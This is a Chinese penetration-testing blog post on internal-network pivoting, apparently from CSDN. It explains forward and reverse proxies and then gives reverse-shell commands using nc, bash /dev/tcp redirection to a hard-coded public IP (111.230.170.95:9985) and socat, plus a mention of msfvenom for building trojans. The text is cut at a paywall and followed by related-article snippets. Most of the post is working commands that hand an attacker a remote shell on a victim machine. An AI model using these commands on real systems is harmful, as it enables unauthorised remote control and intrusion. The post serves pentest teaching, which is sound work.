内网渗透之——内网转发(反弹shell、端口、代理)

最新推荐文章于 2025-03-07 23:17:57 发布
最新推荐文章于 2025-03-07 23:17:57 发布
阅读量1.1w 收藏 56
点赞数 17
分类专栏: 渗透测试(内网渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wsnbbz/article/details/104893482
版权

转发目的

渗透测试中,我们往往会面对十分复杂的内网环境,比如最常见的防火墙,它会限制特定端口的数据包出入,此时就需要内网转发

转发情景

1.A可以访问B的80端口,但是不能访问B的3389端口。
2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。

代理方式

正向代理:

正向代理是服务器开放端口,客户端主动访问服务器的端口

 
我们常说的代理就是指正向代理,正向代理的过程,它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。
举个例子在国内用浏览器访问 www.google.com 时,因为防火墙的原因拒绝连接,这时候你可以在国外搭建一台代理服务器,让代理帮你去请求google.com,代理把请求返回的相应结构再返回给你。

反向代理:

反向代理是客户端开发端口,服务器连接客户端


反向代理是相对于服务器而言的,当我们请求 www.baidu.com 的时候,背后可能有成千上万台服务器为我们服务,但具体是哪一台,不需要知道,你只需要知道反向代理服务器是谁就好了,www.baidu.com 就是我们的反向代理服务器,反向代理服务器会帮我们把请求转发到真实的服务器那里去,比如说负载均衡。

内网转发形式

1.反弹shell:在攻击者机器,获取受害者机器的命令行
2.反弹端口:受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发
3.反弹代理:将攻击者的流量转发到内网其他服务器上

反弹shell

1.工具nc使用

条件:能够访问到受害者机器的开放端口
方式:tcp 连接是外网攻击机发起的,连接被控服务器
步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入)

nc -lvp 4444 -e cmd.exe      (反弹windows shell)
nc -lvp 4444 -e /bin/bash     (反弹linux shell)

此处以windows为例:


步骤二:攻击机连接被控服务器的4444端口(攻击机输入)

nc -vv 受害机ip 4444

1.2利用nc反弹shell

条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限不够时利用nc反向连接)
方式:tcp连接是被控服务器发起,连接外网攻击机
步骤一:外网服务器监听4444端口
(攻击机输入)

nc -lvp 4444


步骤二:在被控服务器反弹shell到外网服务器的4444端口
(受害机输入)

nc -e cmd.exe 攻击机ip 4444(反弹windows shell)
nc -e /bin/bash 攻击机ip 4444(反弹linux shell)

此处以windows为例:

2.工具msf使用

2.1 msfconsole

作用:管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。

模块介绍:

exploits:攻击脚本
payloads:攻击载荷(攻击效果控制)
auxiliaru:辅助模块(扫描工具等)
post:后渗透模块(提取信息)
encoders编码模块
nops:无操作生成器

2.2 msfvenom

作用:制作木马

2.3 msfencode

作用:对木马进行编码

2.4 msf使用:

请点击此链接查看我的另一篇文章,介绍了msf具体使用

3. 其他Linux反弹shell方法

方式:

利用系统自带的bash和gawk
利用脚本:python、perl、ruby、lua、php、jsp、aspx
利用第三方服务或工具:elnet、xterm、socat、nc

例:

3.1.1 nc发送shell
发送端(公网服务器):

nc -lvvp 6666 -e /bin/bash

接收端:

nc 发送端ip 发送端攻击者ip

3.1.2 nc反弹shell
接收端:

nc -lvvp 6666

发送端(内网网服务器):

nc 接收端ip 接收端端口 -e /bin/bash

3.2 bash反弹
接收端(hackip,公网):

nc -lvvp 端口

发送端(受害者):

bash -i >& /dev/tcp/111.230.170.95/9985 0>&1

或者发送端(受害者):

0<&31-;exec 31<>/dev/tcp/111.230.170.95/9985;sh <&31 >&31 2>&31

3.3.1 socat反弹(tcp)
接收端(攻击机):

./socat TCP-LISTEN:端口

发送端(靶机):

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口

3.3.2 socat反弹(udp)
接收端:

nc -lvvp 8080

发送端:

socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

3.4 python反弹

接收端(攻击机,外网):

nc -lvvp 端口

最低0.47元/天 解锁文章
内网渗透测试——内网转发
cldimd的博客
04-01 769
内网转发目的: 渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。 A可以访问B的80端口,但是不能访问B的3389端口。 A可以访问B,B可以访问C,但是A不可以访问C。需要过B转发数据,让A和C进行信。 代理: (一)正向代理 我们常说的代理就是指正向代理,正向代理的过程,它隐藏了真实的请求客户端,服务端不知道真实的客户...
内网转发——反弹shell
cxrpty的博客
03-16 1163
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理服务器开放端口,客户端主动访问服务器端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口服务器连接客户端。反向代理是相对于服务...
内网转发
秋水的博客
10-14 3167
内网转发简介 在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段,一般情况下,内网中的其他机器是不允许外网机器访问的。这时候,我们可以端口转发(隧道) 或将这台外网服务器设置成为 代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转...
内网渗透代理转发、映射,从零基础到精,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
02-22 906
在我们日常的内网渗透过程中,都需要用到代理转发、映射。在这篇文章中,团队成员Z师傅系统性地整理了相关笔记,希望能帮助到各位师傅的内网渗透~是一个位于客户端和目标服务器之间的服务器(代理服务器),为了从目标服务器取得内容,客户端向代理 服务器发送一个请求并指定目标,然后代理服务器向目标服务器转交请求并将获得的内容返回给客户端。俗点来说:已控服务器监听端口过这个端口形成一个正向的隧道,由代理机器代替主机去访问内网目标。但是内网入口一般处于DMZ区域有防火墙拦截,无法直接进入内网环境。Lhost–>
内网转发教程
Wrop的博客
07-10 780
本文介绍了内网转发的相关内容
内网转发简介
buffedon的博客
10-06 1075
内网转发内网转发分类分类方式一 (按原理分)分类方式二 (按攻击手法分)端口转发,隧道,代理反弹shell反弹shell的目的端口转发动态转发本地转发远程转发端口转发端口映射代理参考文章 在后渗透阶段,外网是无法访问内网的,因此可以端口转发(隧道) 的方式,将web服务器作为代理,从而使得攻击者可以操控内网主机 内网转发分类 分类方式一 (按原理分) 代理方式 socket Netcat,netsh,LCX socks EW,Ssocks 隧道方式 SSH,HTTP,IMCP
内网内网转发】——代理转发_SSH代理转发
weixin_45588247的博客
09-22 2440
文章目录一、环境准备:二、工具:三、概念:四、学习目的:五、SSH代理转发介绍:六、SSH代理转发使用说明:七、SSH代理转发:1. 正向动态转发隧道:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程: 一、环境准备:   准备一台CentOS主机,并为CentOS主机添加一张网卡,并为它配置为处于内网环境。以下是网上配置过程: 1、添加网卡: 2、查看新添加的网卡mac地址: 3、找到新添加的网卡mac地址对应的是哪张网卡: 4、配置网卡: 命令: cd /etc/sysco
内网转发——反弹端口
cxrpty的博客
03-17 4049
反弹端口:是指受害者服务器的某一个端口不能访问,我们反弹端口的形式,让攻击者能够访问端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1138
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 过Metasoloit的HTA Web Server模块发起HTA攻击 过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
内网渗透笔记——vulnhub内网结课渗透
wang_zui_zui的博客
03-14 816
准备步骤: 靶机:Beelzebub ip地址:192.168.111.136 攻击机:kali ip地址:192.168.111.130 Vmware下NAT模式连接 一、进行信息收集 1、使用nmap命令扫网段 发现目标ip——192.168.111.136 2、对目标ip进行详细的扫描 发现开放了22和80两个端口,考虑能不能过爆破22号端口来取得shell? 3.尝试爆破 利用user&pass.txt字典,为了防止电脑跑烂掉选择admin,user等较常用
内网端口转发
路虽远,行将至。事虽难,做必达。
08-10 1158
渗透过程中拿到主机权限后,下一步常是进行内网横向,而企业内网在不出网的情况下,我们无法直接进行扫描、反弹shell等操作,这时候就需要搭建隧道来进行数据包转发,使我们能间接的与内网进行信。...
内网代理转发工具
tomyyyyy
12-09 4394
目录概念区分端口转发端口映射代理隧道端口转发工具概念讲解socket端口转发socks代理两者的异同端口转发常用工具msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具基于web服务的socks5工具reGeorgTunna能够进行多层代理的工具Earthworm(又称ew)Termitevenomfuso多功能型的代理工具frp...
内网端口转发 - 简单记录
fa1c4的blog
07-17 912
常见的端口流量转发工具 (1) SSH (2) EW (3) NetCat (4) LCX 常见目的 (1) 安全运维: 绕过堡垒机/防火墙限制, 建立TCP链接, 对内网服务器进行远程管理 (2) 内网渗透: 绕过堡垒机/防火墙限制, 实现对内网服务器的攻击 分类 (1) 本地转发 (2) 远程转发 (3) 动态转发 本地转发 本地主机开启端口转发功能, 需要在用户机执行 ssh -L 8866:196.168.10.1:23 -fN 196.168.10.2 示意图 远程转发 堡垒机开启端口转发功能
内网转发ngrok
huihui870311的专栏
06-01 503
https://ngrok.com/
内网转发的基本操作
m0_64674174的博客
08-25 2284
我们需要一个代理搭建成功的标志,这里个人使用phstudy搭建网络服务,在失陷主机以及内网主机均开启http服务,已攻击机可以访问内网主机的http服务为代理成功标志,失陷主机需要上传一些需要的工具,这里关闭失陷主机的安全中心,具体操作为直接搜索安全中心即可。内网穿透和内网转发这俩个概念的话,内网穿透是内网进入到外网,内网转发是指外网进入到内网,但是个人感觉实际功能上并无太大差距,都是为了实现外网能够访问内网的某些服务,实际上还都是过设置路由进行转发
内网渗透代理转发
D0126_的博客
04-25 944
正向代理中,Proxy和Client同属一个区域,对Server是透明的;正向代理的是客户端,反向代理的是服务端,可以理解为正向代理是就比如年少时期喜欢那个Ta,当时很羞涩需要我自己(Lhost)写一份信(proxy)去告诉Ta,反向代理就是喜欢的那个Ta(Rhost)知道并且主动(proxy)过来告诉自己(Lhost)。Lhost只向proxy发送普的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。
内网渗透内网端口转发
最新发布
没有网络安全就没有国家安全
03-07 861
内网渗透内网端口转发
红队靶场之SickOS1.1复现过程,反弹shell,目录扫描代理转移
m0_58116751的博客
05-17 1911
它的默认登录页面是存在没有被更改,在渗透测试中想要进入后台,分三种,一是猜测尝试弱密码,一种就是字典爆破他的密码,然后就是在网页信息中去查找弄出他的密码,emmm,运气比较好尝试一下,admin,admin。也是列举出了他的很多账号,我们看到了 root sickos 还有当前用户www-data这几个重点用户,我们现在有密码有用户,登录凭证的条件都有了,根据大多人的习惯密码都是相同的那我们来尝试ssh连接吧。我们起手依旧是对于整个网段进行一个扫描,产看整个网段的存活情况来和IP端口的开放情况,
内网端口转发代理
aheyor的博客
10-30 362
在红蓝对抗(Red Teaming vs. Blue Teaming)中,内网端口转发代理是红队常用的技术手段,用于绕过网络边界防御,进一步渗透到目标内网
Linux内网渗透反弹shell技术详解
"这份学习笔记整合了多种反弹shell的方法,包括bash反弹、telnet反弹和nc反弹,主要面向网络安全和内网渗透领域的学习者。内容详尽地介绍了各种反弹shell的命令行操作,适用于Linux环境,并提醒注意不同发行版可能...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值